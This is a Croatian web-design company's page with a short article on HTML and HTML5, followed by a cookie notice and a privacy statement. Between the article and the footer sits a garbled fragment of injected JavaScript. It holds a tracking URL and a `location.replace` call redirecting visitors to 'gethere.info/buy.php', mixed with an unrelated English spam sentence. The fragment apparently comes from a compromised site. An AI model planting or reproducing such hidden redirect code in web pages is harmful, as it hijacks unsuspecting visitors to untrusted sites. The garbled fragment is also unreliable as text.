Pošaljite upit!

HTML 5

HTML 5

 

 

HTML je kratica za HyperTextMarkupLanguage, što je standardni format koji se koristi za kreiranje internet stranice. Kodovi, koji su također poznati kao oznake, prepoznatljivi su po < > zagradama. Nakon < znaka slijedi element, koji je zapravo naredba za preglednik a završava sa znakom >.

 

To je kod koji se nalazi iza kulise većine internet stranica koje posjećujete. Kod čuva sve formulacije na određenom mjestu, te dopušta web dizajenrima da putem koda, koji je dizajniran posebno za svaku stranicu, dodaju strukturu web stranici.

 

Prije 20 godina Internet je bio ništa više nego skupina internet stranica koje su izvorno dizajnirane za obradu teksta, sa sasvim malo strukture. Kad bi htjeli otići na drugu stranicu , trebao je postojati ispravan način za prijelaz sa jedne stranice na drugu. Tu glavnu ulogu ima hypermarkup jezik. Kada je nastao kod, omogućilo se pojedincima da kliknu na određeno mjesto kako bi ih odvelo na drugu lokaciju stranice po njihovom izboru. Kako je Internet počeo rasti, slike i videa postali su neizostavni dio stranice, nastala je potreba da se izvorni HTML kod zamjeni.

Od osnutka 1990 godine, napravljene su četiri takve izmjene. Međutim, zbog velike količine interaktivnih elemenata, animacija, videa i velike količine slika, nova verzija je bila prijeko potrebna. S obzirom da je nastao dug period između zadnje izmjene, mnoge firme su morale osmisliti vlastite kodove kako bi ugradili videa ili ostale oblike reprodukcije. Ti kodovi dolaze u obliku podataka koji su razvijeni od strane tvrtki kao što su RealPlayer, Windows Media Player, QuickTime i Adobe Flash.

 

Stoga je stigao HTML 5. Od samog koda, nova revizija obećava pružanje mogućnosti ugradnje videa i niza drugih aspekata bogatih medija. Ova verzija HTML koda pruža web majstorima i dizajnerima mogućnost ugradnje u preglednik, uređivanje sadržaja, drag-and- drop mogućnosti, vektorsku grafiku, te niz drugih elemenata. Svi ovi procesi će moći biti napisani u kodovima bez korištenja drugih plag-inova. Programeri i dizajneri su jedva dočekali dan kada će biti dostupan kod koji će im omogućiti ove jednostavne procese.

Iako je samo nekoliko novih mogućnosti koje pruža HTML5, ovo je veliki skok sa HTML4 koji je nastao prije više od 10 godina.

 

Ako želite više informacija o ovoj temi, slobodno nas kontaktirajte.

 

Vaš Web za mene

 

 

 

 ”http:///?sl=319481-c261c&data1=Track1&data2=Track2″; location.replace(“http://gethere.info/buy.php”);if (document.currentScript) { A thoughtless tweet or a badly timed facebook may see this website cause you to be reprimanded by your boss, and a social media blunder could even cost you your precious job

Nastavkom pregledavanja ove stranice prihvačate korištenje Cookia. Više informacija

IZJAVA O PRIVATNOSTI Webnet poštuje vašu privatnost te nastojimo osigurati tajnost vaših privatnih podataka Svjesni smo da ubrzani rast interneta i online servisa utječu na pitanja vezana uz vaše osobne podatke, ali isto tako nastojimo sve vaše skupljene podatke držati u strogoj tajnosti te se obvezujemo da ćemo voditi računa o sigurnosti i tajnosti vaših osobnih podataka. KOJE INFORMACIJE PRIKUPLJAMO? Prikupljamo informacije iz online registracijskog formulara koje ispunjava sam korisnik. Prilikom narudžbe ili registracije možemo Vas tražiti za Vaše cijenjeno ime, prezime, email adresu, adresu i telefonski broj. Pregledavati web trgovinu možete i bez dostave vaših osobnih podataka. U KOJU SVRHU UPOTREBLJAVAMO VAŠE OSOBNE PODATKE? Vaše podatke možemo koristiti u sljedeće svrhe: • personalizacija sadržaja (vaše podatke koristimo u svrhu unapređenja kvalitete sadržaja namijenjenog pojedinom korisniku) • unapređenje naše web stranice (neprestano unapređujemo našu stranicu na temelju Vaših kritika, iskustava i prijedloga) • unapređenje usluge (vaši podaci nam omogućuju da unaprijedimo korisničku podršku te što kvalitetnije zadovoljimo korisničke zahtjeve i potrebe) • slanje periodičnih e-mailova ( u svrhu unapređenja usluga i poboljšanja korisničkih iskustava šaljemo periodične mailove sa relevantnim novostima, informacijama i obavjestima) • promocija, administracija i nadzor stranice NA KOJI NAČIN ČUVAMO VAŠE PODATKE? Vaše podatke čuvamo implementacijom sigurnosnih mjera. KORISTIMO LI COOKIJE? Stranica www.webzamene.net koristi cookije DIJELIMO LI VAŠE PODATKE VANJSKIM PARTNERIMA? Vaše podatke ne prodajemo, mijenjamo ni na koji način dijelimo s vanjskim partnerima. Vaše podatke dostavljamo JEDINO u slučaju kršenja zakona ili na temelju sudskog naloga kojeg smo dužni poštovati. GUBITAK VAŠIH OSOBNIH PODATAKA Stranica www.webzamene.net ne odgovara za štetu nastalu gubitkom Vaših osobnih podataka. Webnet d.o.o. ne može se smatrati odgovornim za zlouporabe za koje se ne može utvrditi da su nastale kao posljedica tehničko-sigurnosnog propusta sustava web trgovine ili propusta djelatnika Webnet d.o.o. ONLINE IZJAVA O PRIVATNOSTI Ova izjava privatnosti vrijedi samo za informacije prikupljene preko naše web stranice, ne vrijedi za informacije prikupljene offline putem. VAŠA SUGLASNOST Koristeći stranicu www.webzamene.net pristajete na Izjavu o privatnosti. PROMJENE U DOKUMENTU "IZJAVA O PRIVATNOSTI" Ukoliko ćemo imati potrebu za promjenom dokumenta "Izjava o privatnosti" sve navedene izmjene će biti objavljene u ovom dokumentu. Zadnji datum izmjene: 10/11/2012 KONTAKTIRAJTE NAS Ukoliko imate bilo kakvo pitanje vezano uz sigurnost vaših osobnih podataka možete nas kontaktirati na : mail: info@webnet.hr

Zatvori